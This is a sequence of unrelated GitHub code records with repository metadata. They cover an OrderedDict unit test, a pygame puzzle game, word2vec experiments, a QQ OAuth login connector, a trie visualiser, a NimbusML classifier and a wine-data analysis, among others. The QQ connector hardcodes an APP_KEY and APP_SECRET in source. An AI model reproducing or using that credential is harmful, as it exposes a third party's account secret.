Corresponds to test case TEST-0072.\n \"\"\"\n test_output = [\"abc\", \"def\", \"ghi\"]\n od = TestOrderedDict.get_test_dict()\n index = 0\n for key in od.__iter__():\n k = test_output[index]\n self.assertEqual(k, key)\n index += 1\n\n def test_reversed(self):\n \"\"\"\n Description: Tests that the OrderedDict:__reversed__()\n magic method returns a generator function that yields\n keys in reverse order from an ordered dictionary\n containing the following mappings:\n {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Input: This function accepts no input.\n\n Output:\n (generator): A generator function that yields\n keys in the following order:\n 2, 1, 0.\n\n Test Case: Corresponds to test case TEST-0073.\n \"\"\"\n test_output = [\"ghi\", \"def\", \"abc\"]\n od = TestOrderedDict.get_test_dict()\n index = 0\n for key in od.__reversed__():\n k = test_output[index]\n self.assertEqual(k, key)\n index += 1\n\n\n def test_pop_item_rear(self):\n \"\"\"Description: Tests that the OrderedDict:popitem()\n function returns the last key-value pair in an OrderedDict\n consisting of the following mappings:\n {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Input:\n (boolean): True\n\n Output:\n (str, int): (\"ghi\", 2)\n\n Test Case: Corresponds to test case TEST-0074.\n \"\"\"\n test_output = (\"ghi\", 2)\n od = TestOrderedDict.get_test_dict()\n self.assertEqual(od.popitem(True), test_output)\n\n def test_pop_item_front(self):\n \"\"\"\n Description: Tests that the OrderedDict:popitem()\n function returns the first key-value pair in an\n OrderedDict consisting of the following key-value\n mappings: {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Input:\n (boolean): False\n\n Output:\n (str, int): (\"abc\", 0)\n\n Test Case: Corresponds to test case TEST-0075.\n \"\"\"\n test_output = (\"abc\", 0)\n od = TestOrderedDict.get_test_dict()\n self.assertEqual(od.popitem(False), test_output)\n\n def test_reduce(self):\n \"\"\"\n Description: Tests that the OrderedDict:__reduce__()\n function works correctly.\n\n Input: This function accepts no input.\n\n Output:\n (OrderedDict, list): A Tuple consisting of a class\n reference to an OrderedDict containing the following\n mappings: {\"abc\": 0, \"def\": 1, \"ghi\": 2}, as well\n as a list of all key-value entries in the ordered\n dictionary.\n\n Test Case: Corresponds to test case TEST-0076.\n \"\"\"\n test_output = (ordered_dict.OrderedDict, ([['abc', 0], ['def', 1], ['ghi', 2]],))\n od = TestOrderedDict.get_test_dict()\n self.assertEqual(od.__reduce__(), test_output)\n\n\n def test_keys(self):\n \"\"\"\n Description: Tests that the OrderedDict:keys() function\n returns athe correct list of keys from an ordered\n dictionary via a generator function.\n\n Input: This function accepts no input.\n\n Output:\n (generator): A generator that yields the following\n keys in this order: \"abc\", \"def\", \"ghi\".\n\n Test Case: Corresponds to test case TEST-0077.\n \"\"\"\n test_output = [\"abc\", \"def\", \"ghi\"]\n\n od = TestOrderedDict.get_test_dict()\n index = 0\n for key in od.keys():\n self.assertEqual(key, test_output[index])\n index += 1\n\n\n def test_repr(self):\n \"\"\"\n Description: Tests that __repr__() returns the\n correct string representation of an OrderedDict.\n\n Input: This function accepts no input.\n\n Output:\n (str): A string representation of an OrderedDict\n containing the following mappings:\n {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Test Case: Corresponds to test case TEST-0078.\n \"\"\"\n od = TestOrderedDict.get_test_dict()\n rep = str(od)\n # TODO: Testing needs performed here as well\n\n\n def test_copy(self):\n \"\"\"\n Description: Tests that the OrderedDict:copy() function\n returns a copy of an ordered dictionary.\n\n Input:\n (OrderedDict): An OrderedDict containing the\n following mappings: {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Output:\n (OrderedDict): An identical OrderedDict to the\n input OrderedDict containing the following mappings:\n {\"abc\": 0, \"def\": 1, \"ghi\": 2}.\n\n Test Case: Corresponds to test case TEST-0079.\n \"\"\"\n od = TestOrderedDict.get_test_dict()\n self.assertEqual(od, od.copy())\n\n\n def test_fromkeys_correct(self):\n \"\"\"\n Description: Tests that the OrderedDict:fromkeys()\n function correctly constructs an ordered dictionary\n from a list of keys.\n\n Input:\n (list): [\"abc\", \"def\", \"ghi\"]\n\n Output:\n (OrderedDict): An OrderedDict containing the\n keys \"abc\", \"def\", \"ghi\".\n\n\n Test Case: Corresponds to test case TEST-0080.\n \"\"\"\n test_input = [\"abc\", \"def\", \"ghi\"]\n od = ordered_dict.OrderedDict.fromkeys(test_input)\n index = 0\n for key in od.keys():\n self.assertEqual(key, test_input[index])\n index += 1\n\n def test_fromkeys_empty_list(self):\n \"\"\"\n Description: Tests that the OrderedDict:fromkeys()\n function correctly constructs an ordered dictionary\n from an empty list of keys.\n\n Input:\n (list): An empty list.\n\n Output:\n (OrderedDict): An OrderedDict containing no\n key-value pairs.\n\n Test Case: Corresponds to test case TEST-0081.\n \"\"\"\n od = ordered_dict.OrderedDict.fromkeys([])\n self.assertEqual(len(od), 0)\n\n def test_equals_true(self):\n \"\"\"\n Description: Tests that the OrderedDict:__eq__() function\n correctly identifies an equal ordered dictionary.\n\n Input:\n (OrderedDict, OrderedDict): The first OrderedDict\n should have identical key-value pairs to the\n second OrderedDict.\n\n Output:\n (boolean): True\n\n Test Case: Corresponds to test case TEST-0082.\n \"\"\"\n od = TestOrderedDict.get_test_dict()\n other = TestOrderedDict.get_test_dict()\n self.assertEqual(od.__eq__(other), True)\n\n def test_equals_false(self):\n \"\"\"\n Description: Tests that the OrderedDict:__eq__() function\n correctly identifies a non-equal ordered dictionary.\n\n Input:\n (OrderedDict, OrderedDict): The first OrderedDict\n should have different key-value pairs from the\n second OrderedDict.\n\n Output:\n (boolean): False\n\n Test Case: Corresponds to test case TEST-0083.\n \"\"\"\n od = TestOrderedDict.get_test_dict()\n other = ordered_dict.OrderedDict()\n self.assertEqual(od.__eq__(other), False)\n\n def test_not_equals_false(self):\n \"\"\"\n Description: Tests that the OrderedDict:__ne__() function\n correctly identifies an equal ordered dictionary.\n\n Input:\n (OrderedDict, OrderedDict): The first OrderedDict\n should have identical key-value pairs to the\n second OrderedDict.\n\n Output:\n (boolean): False\n\n Test Case: Corresponds to test case TEST-0084.\n \"\"\"\n od = TestOrderedDict.get_test_dict()\n other = TestOrderedDict.get_test_dict()\n self.assertEqual(od.__ne__(other), False)\n\n def test_not_equals_true(self):\n \"\"\"\n Description: Tests that the OrderedDict:__ne__() function\n correctly identifies a non-equal ordered dictionary.\n\n Input:\n (OrderedDict, OrderedDict): The first OrderedDict\n should have different key-value pairs from the\n second OrderedDict.\n\n Output:\n (boolean): True\n\n Test Case: Corresponds to test case TEST-0085.\n \"\"\"\n od = TestOrderedDict.get_test_dict()\n other = ordered_dict.OrderedDict()\n self.assertEqual(od.__ne__(other), True)\n","repo_name":"gollum18/simplejson-test-suite","sub_path":"simplejson/simplejson/tests/test_ordered_dict.py","file_name":"test_ordered_dict.py","file_ext":"py","file_size_in_byte":12052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9262634061","text":"import pygame\n\nimport setup\nfrom data.add_map import AddMap\nfrom engine.buttons.buttons import Buttons\nfrom engine.game import Game\nfrom engine.screen.start_screen import StartScreen\nfrom setup import *\nfrom sound.sound import Sound\n\n# Подсказки глючат\n# Отключить кнопки при выигрыше\n\npygame.init()\npygame.display.set_caption(\"СКАН-МАТИК / Японские сканворды с математикой\")\nsize = [WIDTH, HEIGHT]\nscene = pygame.display.set_mode(size)\nclock = pygame.time.Clock()\nplayGame = True\ndeltatime = 0\n\nmaps = AddMap()\n\nbuttons = Buttons()\nsound = Sound(pygame)\ngame = Game(maps, sound)\n\nmouse_button_pressed_1 = 0\nmouse_button_pressed_3 = 0\n\nstart_screen = StartScreen()\nif setup.error < 8:\n sound.play(Sound.START_PLAY_GAME)\nelse:\n start_screen.enabled = False\n\nwhile playGame:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n playGame = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n playGame = False\n # Если нет класса с выведенным примером для решения\n # и закончилась экранная заставка\n if setup.view_example is None:\n if event.type == pygame.MOUSEBUTTONDOWN and not start_screen.enabled:\n if mouse_button_pressed_1 == 0 and event.button == 1:\n sound.play(Sound.CLICK)\n game.press_mouse_1(pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\n game.set_filling(pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\n\n if mouse_button_pressed_3 == 0 and event.button == 3:\n sound.play(Sound.CLICK)\n game.set_blocked(pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\n\n mouse_button_pressed_1 = event.button\n mouse_button_pressed_3 = event.button\n\n elif event.type == pygame.MOUSEBUTTONUP:\n mouse_button_pressed_1 = 0\n mouse_button_pressed_3 = 0\n else:\n mouse_button_pressed_1 = 0\n mouse_button_pressed_3 = 0\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n setup.view_example.press_mouse_button_1(pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\n\n scene.fill(\"#1c3055\")\n game.draw(scene, deltatime)\n\n if setup.view_example is not None:\n buttons.draw(scene, pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1], False)\n setup.view_example.draw(scene)\n elif not start_screen.enabled:\n pressed_btn = buttons.draw(scene, pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1], True)\n\n if pressed_btn == Buttons.AUTHORS:\n game.draw_authors(scene, deltatime)\n\n if pressed_btn == Buttons.PLAY:\n game.draw_play(scene, deltatime)\n\n if mouse_button_pressed_1 == 1 and pressed_btn != \"NONE\":\n mouse_button_pressed_1 = 0\n if pressed_btn == Buttons.CHECK:\n sound.play(Sound.CLICK)\n game.check_end_round()\n elif pressed_btn == Buttons.RESTART:\n sound.play(Sound.CLICK)\n game.start_level()\n elif pressed_btn == Buttons.HINT:\n sound.play(Sound.HELP)\n game.run_help()\n elif pressed_btn == Buttons.MATH_30:\n sound.play(Sound.COMPLEXITY)\n setup.difficulty = 1\n game.start_level()\n elif pressed_btn == Buttons.MATH_60:\n sound.play(Sound.COMPLEXITY)\n setup.difficulty = 2\n game.start_level()\n elif pressed_btn == Buttons.MATH_100:\n sound.play(Sound.COMPLEXITY)\n setup.difficulty = 0\n game.start_level()\n elif pressed_btn == Buttons.NEXT:\n sound.play(Sound.CLICK)\n setup.level += 1\n if setup.level == len(game.maps.level) or setup.level == setup.max_level + 1:\n setup.level -= 1\n game.start_level()\n elif pressed_btn == Buttons.PREV:\n sound.play(Sound.CLICK)\n setup.level -= 1\n if setup.level < 0:\n setup.level = 0\n else:\n game.start_level()\n elif pressed_btn == Buttons.EXIT:\n setup.save()\n playGame = False\n elif pressed_btn == Buttons.RESET_GAME:\n sound.play(Sound.CLICK)\n setup.reset()\n game.gamestate = Game.PLAY_GAME\n game.start_level()\n\n if start_screen.alpha > 0:\n start_screen.draw(scene, deltatime)\n\n pygame.display.flip()\n\n # Если не отображено окно с примером, то работаем с мышкой и основным полем\n if setup.view_example is None:\n if mouse_button_pressed_1 == 1:\n game.mouse_1_button_down(mouse_button_pressed_1, pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\n if mouse_button_pressed_3 == 3:\n game.mouse_3_button_down(mouse_button_pressed_3, pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\n\n game.act(deltatime, pygame.mouse.get_pos()[0], pygame.mouse.get_pos()[1])\n\n deltatime = clock.tick(FPS) / 1000\n\npygame.quit()\nsetup.save()","repo_name":"Fox-Bella/nonogramms","sub_path":"nonogramms.py","file_name":"nonogramms.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27173329337","text":"from gensim.models import KeyedVectors\r\nimport time\r\nimport numpy as np\r\nmodel_dir = './entity_vector/entity_vector.model.bin'\r\nmodel = KeyedVectors.load_word2vec_format(model_dir, binary=True)\r\n# model_dir = './jawiki_word_vectors_300d/word_vectors.txt'\r\n# model = KeyedVectors.load_word2vec_format(model_dir, binary=False)\r\nprint(type(model))\r\n\r\n# print(len(model.get_vector('九州')))\r\nstart = time.time()\r\nprint('九州' in model)\r\nend = time.time()\r\nprint(end-start)\r\n# print(model(u'九州大学'))\r\n\r\n# results = model.most_similar(u'九州大学')\r\n# for result in results:\r\n# print(result)\r\n#\r\n# print('\\n')\r\n#\r\n\r\n\r\nmodel_dir = './entity_vector/entity_vector.model.bin'\r\nmodel = KeyedVectors.load_word2vec_format(model_dir, binary=True)\r\nsimilar_list = model.most_similar(positive=[u'[東京]',u'[日本]'],negative=[u'[アメリカ]'])\r\nfor similar_set in similar_list:\r\n print(similar_set)\r\n\r\nvector = model.get_vector(\"東京\")\r\nprint(vector)\r\nprint(type(vector))\r\nprint(vector.shape)\r\nsim_vector = np.zeros(200)\r\nsim_vector[1:200] = vector[1:200]\r\nsim_vector[0] = vector[0] * 0.9\r\nprint(sim_vector)\r\nprint(model.similar_by_vector(sim_vector)[0][0])\r\n\r\ndef cosine_similarity(X, Y):\r\n \"\"\"\r\n 行列X,Yの列ベクトルと行ベクトルのコサイン類似度をまとめて計算し,コサイン類似度を並べたリストを出力\r\n \"\"\"\r\n return (X @ Y.T) / np.sqrt(np.nansum(np.power(X, 2), axis=1) * np.nansum(np.power(Y, 2), axis=1)) # .Tは転置行列\r\n\r\ndef word_vectors(word, model):\r\n \"\"\"\r\n 引数のwordは単語,modelはword2vecのモデル(下の_main_参照)\r\n word2vecが引数のwordに対応していればその単語に対応する200次元wordベクトルを,なければ0が200個並ぶベクトルを返す\r\n \"\"\"\r\n if word in model:\r\n return model.get_vector(word)\r\n else:\r\n return np.zeros(200)\r\n\r\n# v = np.asarray([word_vectors(word, model) for word in model])\r\n# print(len(v))\r\n\r\n\r\n","repo_name":"Takashi-Ishikawa-0419/lyrics_classification","sub_path":"word2vec_practice2.py","file_name":"word2vec_practice2.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29168510403","text":"#coding=utf-8\n\nfrom connector import Connector\nimport urllib2, json, urlparse\n\nAPP_KEY = '100406677'\nAPP_SECRET = '0a1d05bcf76ed7f37d2467902c967120'\n\nclass QQConnector(Connector):\n\n name = 'qq'\n verbose_name = u'QQ'\n login_image = 'http://qzonestyle.gtimg.cn/qzone/vas/opensns/res/img/Connect_logo_7.png'\n\n def __init__(self):\n self.openid_url = 'https://graph.qq.com/oauth2.0/me'\n\n super(QQConnector, self).__init__(\n key=APP_KEY,\n secret=APP_SECRET,\n login_url='https://graph.qq.com/oauth2.0/authorize',\n get_token_url='https://graph.qq.com/oauth2.0/token',\n api_url='https://graph.qq.com/',\n )\n\n def _parse_token(self, response):\n token_dict = urlparse.parse_qs(response)\n access_token = token_dict['access_token'][0]\n expire = token_dict['expires_in'][0]\n\n url = '%s?access_token=%s' % (self.openid_url, access_token)\n response = urllib2.urlopen(url).read()[9:-3]\n uid = json.loads(response)['openid']\n\n response = self._qq_api(uid, access_token, 'user/get_user_info')\n return uid, response['nickname'], access_token, expire\n\n def _qq_api(self, uid, access_token, url, **kwargs):\n return self.api(access_token, url, oauth_consumer_key=APP_KEY, openid=uid, format='json', **kwargs)\n\n def settings(self, uid, access_token):\n\n return {\n }\n","repo_name":"zneo317/Projects","sub_path":"niubsteel/users/connectors/qq.py","file_name":"qq.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34997549330","text":"# Author:Piao Luo\n# 生成器 由于内存有限,对一些有规律的列表,进行一边循环一边计算,只有在调用的时候才会生成,且只记录当前位置,节约内存\n# 列表生成式\nlist = [i * 2 for i in range(10)]\nprint(list) # [0, 2, 4, 6, 8, 10, 12, 14, 16, 18]\n\n\n# 斐波那契\ndef fib(max):\n n, a, b = 0, 0, 1\n while n < max:\n print(b)\n a, b = b, a + b\n n += 1\n\n\nfib(5)\n\n\n# 生成器\ndef fib1(max1):\n n, a, b = 0, 0, 1\n while n < max1:\n yield b\n a, b = b, a + b\n n += 1\n\n\nf = fib1(100) # 生成器\nprint(f.__next__())\nprint(f.__next__())\nprint(f.__next__())\n","repo_name":"LuoPiaoZZ/pythonTest","sub_path":"lp93.py","file_name":"lp93.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33931034358","text":"#!/usr/bin/env python3\n\ndef preprocess(s:str) -> list:\n s = s.lower().replace(\".\", \"\").split()\n stop_words = [\"in\", \"is\", \"a\", \"of\", \"the\", \"but\", \"itself\", \"more\", \"like\", \"what\", \"does\"]\n s = [word for word in s if word not in stop_words]\n return s\n\ndef make_trie(s:list) -> dict:\n trie = {}\n for word in s:\n node = trie\n for char in word:\n node = node.setdefault(char, {})\n node[\"is_word\"] = False\n node[\"is_word\"] = True\n return trie\n\ndef write_trie_to_graphviz(trie, parent='root', graph=None, edge_label='', file=None):\n # Initialize the file if it does not exist\n if file is None:\n file = open('trie.dot', 'w')\n file.write('digraph Trie {\\n')\n file.write(' node [shape=circle]\\n') # Set the shape of nodes\n # No invisibility style is applied to the root here\n\n # Traverse the trie\n for char, next_node in trie.items():\n if char == \"is_word\":\n continue\n\n # Create a node identifier by appending the character to the parent identifier\n node_id = (parent if parent else '') + char\n\n # Define the background color for is_word nodes\n bg_color = 'yellow' if next_node.get(\"is_word\", False) else 'white'\n\n # Write the node to the file\n file.write(f' \"{node_id}\" [label=\"{char}\", style=filled, fillcolor={bg_color}];\\n')\n\n # Write an edge from the parent to the current node without applying invisibility style\n if parent:\n file.write(f' \"{parent}\" -> \"{node_id}\" [label=\"{edge_label}\"];\\n')\n\n # Recursively write the children of the current node to the file\n write_trie_to_graphviz(next_node, node_id, graph, edge_label='', file=file)\n\n # Only close the file when at the root call to avoid partial writes\n if parent == 'root':\n file.write('}\\n')\n file.close()\n\n # Use the Graphviz command-line tool to convert the .dot file to a PNG file\n import os\n os.system('dot -Tpng trie.dot -o trie.png')\n\ndef make_trie_to_tree(trie: dict) -> dict:\n tree = {}\n for char, next_node in trie.items():\n if char == \"is_word\":\n continue\n tree[char] = make_trie_to_tree(next_node)\n return tree\n\n\n\ndef main():\n s = \"Intelligent behavior in people is a product of the mind. But the mind itself is more like what the human brain does.\"\n s = preprocess(s)\n s = {'intelligent': {\n 'is_word': True\n },\n 'b': {\n 'is_word': False,\n 'ehaviour': {\n 'is_word': True\n },\n 'rain': {\n 'is_word': True\n }\n },\n 'p': {\n 'is_word': False,\n 'eople': {\n 'is_word': True\n },\n 'roduct': {\n 'is_word': True\n }\n },\n 'mind': {\n 'is_word': True\n },\n 'human': {\n 'is_word': True\n }\n }\n write_trie_to_graphviz(s)\n\nif __name__ == \"__main__\":\n main()","repo_name":"johansolbakken/tdt4117-assignment4","sub_path":"1/1c.py","file_name":"1c.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16938877239","text":"#!/bin/python3\n\nimport sys\nimport heapq\n\n\n \n\nn = int(input().strip())\na = []\na_i = 0\nsmaller = []\nlarger = []\n\nfor i in range(n):\n item = int(input().strip())\n if not larger or item >= larger[0]:\n heapq.heappush(larger, item)\n else:\n heapq.heappush(smaller, -item)\n \n size_diff = len(smaller) - len(larger)\n if size_diff == 2:\n transfer = -heapq.heappop(smaller)\n heapq.heappush(larger, transfer)\n if size_diff == -2:\n transfer = heapq.heappop(larger)\n heapq.heappush(smaller, -transfer)\n \n size_diff = len(smaller) - len(larger)\n if size_diff == 0:\n median = (larger[0] - smaller[0])/2\n elif size_diff == 1:\n median = -smaller[0]\n else:\n median = larger[0]\n print(\"%.1f\" % median)\n","repo_name":"HUIYINGLEE/HackerRank","sub_path":"Cracking the Coding Interview Challenges/Heaps: Find the Running Median.py","file_name":"Heaps: Find the Running Median.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1909252746","text":"class Solution(object):\n def maxA(self, N):\n \"\"\"\n :type N: int\n :rtype: int\n \"\"\"\n # @ xiyunyue2\n dp = [i for i in xrange(N + 1)]\n for i in xrange(7, N + 1):\n dp[i] = max(dp[i-4] * 3, dp[i-5] * 4)\n return dp[N]\n\n# 50 / 50 test cases passed.\n# Status: Accepted\n# Runtime: 32 ms\n","repo_name":"zqfan/leetcode","sub_path":"algorithms/651. 4 Keys Keyboard/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"44"} +{"seq_id":"43968957571","text":"import pandas as pd\nimport numpy as np\nimport math\n\nfrom nimbusml import Pipeline, Role\nfrom nimbusml.preprocessing.missing_values import Handler\nfrom nimbusml.feature_extraction.categorical import OneHotVectorizer\nfrom nimbusml.preprocessing.schema import TypeConverter, ColumnConcatenator\nfrom nimbusml.ensemble import FastTreesBinaryClassifier\n\n# load the data files\ntrainData = pd.read_csv(\"train_data.csv\", sep=',') \ntestData = pd.read_csv(\"test_data.csv\", sep=',') \n\n# build a machine learning pipeline\npipeline = Pipeline([\n TypeConverter(columns = [\"Pclass\", \"Age\", \"SibSp\", \"Parch\", \"Fare\"], result_type = \"R4\"),\n Handler(replace_with = \"Mean\") << [\"Age\"],\n OneHotVectorizer() << [\"Sex\", \"Ticket\", \"Cabin\", \"Embarked\"],\n ColumnConcatenator() << {\"Feature\":[\"Pclass\", \"Age\", \"SibSp\", \"Parch\", \"Fare\", \"Sex\", \"Ticket\", \"Cabin\", \"Embarked\"]},\n FastTreesBinaryClassifier() << {Role.Label:\"Survived\", Role.Feature:\"Feature\"}\n])\n\n# train the model\npipeline.fit(trainData)\n\n# evaluate the model and report metrics\nmetrics, _ = pipeline.test(testData)\n\nprint(\"\\nEvaluation metrics:\")\nprint(\" Accuracy: \", metrics[\"Accuracy\"][0])\nprint(\" Auc: \", metrics[\"AUC\"][0])\nprint(\" Auprc: \", metrics[\"AUPRC\"][0])\nprint(\" F1Score: \", metrics[\"F1 Score\"][0])\nprint(\" LogLoss: \", metrics[\"Log-loss\"][0])\nprint(\" LogLossReduction: \", metrics[\"Log-loss reduction\"][0])\nprint(\" PositivePrecision: \", metrics[\"Positive precision\"][0])\nprint(\" PositiveRecall: \", metrics[\"Positive recall\"][0])\nprint(\" NegativePrecision: \", metrics[\"Negative precision\"][0])\nprint(\" NegativeRecall: \", metrics[\"Negative recall\"][0])\n\n# set up a sample\nsample = pd.DataFrame( [[1.0, \"male\", 48, 0.0, 0.0, \"B\", 70.0, \"123\", \"S\"]],\n columns = [\"Pclass\", \"Sex\", \"Age\", \"SibSp\", \"Parch\", \"Ticket\", \"Fare\", \"Cabin\", \"Embarked\"])\n\n# predict diagnosis for sample\nprediction = pipeline.predict(sample)\n\nprint(\"\\nSingle prediction:\")\nprint(\" Prediction: \", \"Survived\" if prediction[\"PredictedLabel\"][0] == 1.0 else \"Perished\")\nprint(\" Probability: \", prediction[\"Probability\"][0])\n","repo_name":"mdfarragher/DSC-PY","sub_path":"BinaryClassification/TitanicPrediction/Program.py","file_name":"Program.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3762608945","text":"from django.contrib import admin\r\nfrom . models import Departments, product,Doctors,Booking\r\n\r\n# Register your models here.\r\nclass productadmin(admin.ModelAdmin):\r\n list_display=('name','price','image')\r\n\r\nadmin.site.register(product,productadmin)\r\n\r\n\r\n\r\nadmin.site.register(Departments)\r\nadmin.site.register(Doctors)\r\n\r\nclass BookAdmin(admin.ModelAdmin):\r\n list_display=('id','p_name','p_phone','P_email','doc_name','booking_date','booked_on')\r\nadmin.site.register(Booking,BookAdmin)\r\n\r\nadmin.site.site_header=\"APOLLO HOSPITAL\"\r\n\r\nadmin.site.index_title=\"welcome admin\"","repo_name":"adnanmuhammed77/medical-management","sub_path":"admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72865774532","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 24 09:21:07 2018\n\n@author: glazaoska1\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport pycountry as pyc\nimport matplotlib\nfrom matplotlib import cm\nimport plotly.plotly as py\nimport plotly.offline as offline\nimport plotly.graph_objs as go\nfrom wordcloud import WordCloud\n\n#Initiate offline notebook for plotly\noffline.init_notebook_mode(connected=True)\n\n#Open data files\nreviews1 = \".\\data\\winemag-data_first150k.csv\"\n\n#Read data into the DataFrame\ndf = pd.read_csv(reviews1, index_col=0)\n\n#Create a scatter graph from the DataFrama\ndef scatter(df):\n \n fig = plt.figure()\n #Scatter the score against price. Low alpha for visualising points density\n plt.scatter(df['price'], df['points'], s=25, alpha=0.008, c='purple', marker='h')\n \n ax = plt.gca()\n \n #Log scale for price\n ax.set_xscale('log')\n \n #Styling\n fig.suptitle('Wine rating vs price', fontsize=12)\n ax.set_xlabel('Price [$]')\n ax.set_ylabel('Rating [out of 100]')\n \n #Save to PNG\n plt.savefig('.\\charts\\scatter.png', format='png', dpi=200)\n\n#Get country ISO-3 code from a name\ndef ccode(cname):\n \n #Check if the name exists in the pycountry list\n try:\n return pyc.countries.get(name=cname).alpha_3\n \n except KeyError:\n \n #Check if the short name works (e.g. US)\n try: \n return pyc.countries.get(alpha_2=cname).alpha_3\n \n except KeyError:\n return None\n \n #Special case for UK \n if(cname=='UK'):\n return 'GBR'\n\n#Formats a cmap into an RGB map ---(source: plotly API)---\ndef cmap_RGB(col_map, inverse):\n \n cmap = matplotlib.cm.get_cmap(col_map)\n col_map_rgb = []\n norm = matplotlib.colors.Normalize(vmin=0, vmax=255)\n \n for i in range(0, 255):\n k = matplotlib.colors.colorConverter.to_rgb(cmap(norm(i)))\n col_map_rgb.append(k)\n \n def matplotlib_plotly(c_map, pl_entries):\n h = 1.0/(pl_entries-1)\n pl_colorscale = []\n \n for k in range(pl_entries):\n \n if(inverse):\n idx = ((pl_entries-1)-k)*h #inverse the colour order\n else:\n idx = k*h #regular order\n \n \n c = list(map(np.uint8, np.array(c_map(idx)[:3])*255))\n pl_colorscale.append([k*h, 'rgb'+str((c[0], c[1], c[2]))])\n \n return pl_colorscale\n \n return matplotlib_plotly(cmap, 255)\n\ndef country_data(df):\n \n #Count the number of reviews for each country\n world_occurences = df['country_code'].value_counts()\n world_occurences = world_occurences.dropna()\n #Add to a new DataFrame\n df_world = pd.DataFrame({'occurences': world_occurences})\n \n #Average score for each country\n df_world['avg_points'] = df.groupby('country_code')['points'].mean()\n #Average price for each country ($ ?)\n df_world['avg_price'] = df.groupby('country_code')['price'].mean()\n \n #Create dictionary for mapping country names to country codes from the initial DataFrame\n cmap = df[['country_code', 'country']].copy().dropna().drop_duplicates().set_index('country_code').to_dict()['country']\n df_world['country_code'] = df_world.index\n #Map country names to codes\n df_world['country'] = df_world['country_code'].map(cmap)\n \n return df_world\n\n#Create a choropleth chart ---(source: plotly API)---\ndef choropleth(df_world, world_meas, measure):\n \n #Data and styling for plotting\n data = [dict(\n type = 'choropleth',\n locations = df_world['country_code'], #dimension, displayed\n z = df_world[world_meas], #measure, displayed\n text = df_world['country'], #displayed country names\n #colorscale = [[0,\"rgb(5, 10, 172)\"],[0.35,\"rgb(40, 60, 190)\"],[0.5,\"rgb(70, 100, 245)\"],[0.6,\"rgb(90, 120, 245)\"],[0.7,\"rgb(106, 137, 247)\"],[1,\"rgb(220, 220, 220)\"]],\n colorscale = cmap_RGB('BuPu', True),\n autocolorscale = False,\n reversescale = True, #legend goes from high to low\n marker = dict(\n line = dict(\n color = 'rgb(180,180,180)',\n width = 0.5\n )),\n colorbar = dict(\n title = measure),)]\n \n #Chart layout properties\n layout = dict(\n title = measure + ' per country',\n geo = dict(\n showframe = False,\n showcoastlines = False, #country coastlines\n showcountries = True, #country borders\n projection = dict(\n type = 'Mercator')))\n \n #Combine chart properties\n fig = dict(\n data = data,\n layout = layout)\n \n #Save an offline copy of the chart\n offline.plot(fig, filename='wine-scores-map.html')\n \ndef wordcloud(df):\n \n words = ';'.join(df.description.tolist()).lower()\n fig = plt.figure(frameon=False)\n wordcloud = WordCloud().generate(words)\n #wordcloud.to_file('.\\charts\\wordcloud.png')\n plt.imshow(wordcloud, interpolation='bilinear')\n plt.axis(\"off\")\n plt.savefig('.\\charts\\wordcloud.png', format='png', dpi=200)\n \n \n#Apply the country coding function\ndf['country_code'] = df['country'].apply(ccode)","repo_name":"azulu/wine-analysis","sub_path":"analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31559648719","text":"import numpy as np\nimport os\n# import dill\nimport pickle as pkl\nimport networkx as nx\nimport scipy.sparse as sp\nfrom sklearn import datasets\n\nfrom sklearn.model_selection import train_test_split\nfrom utils.utilities import run_random_walks_n2v\n\nimport torch\n\nnp.random.seed(123)\n\ndef load_graphs(dataset_str):\n \"\"\"Load graph snapshots given the name of dataset\"\"\"\n with open(\"data/{}/{}\".format(dataset_str, \"graph.pkl\"), \"rb\") as f:\n graphs = pkl.load(f)\n print(\"Loaded {} graphs \".format(len(graphs)))\n adjs = [nx.adjacency_matrix(g) for g in graphs] # Sparse matrix\n return graphs, adjs\n\ndef load_graphs_new(dataset_str):\n with open(\"data/{}/{}\".format(dataset_str, 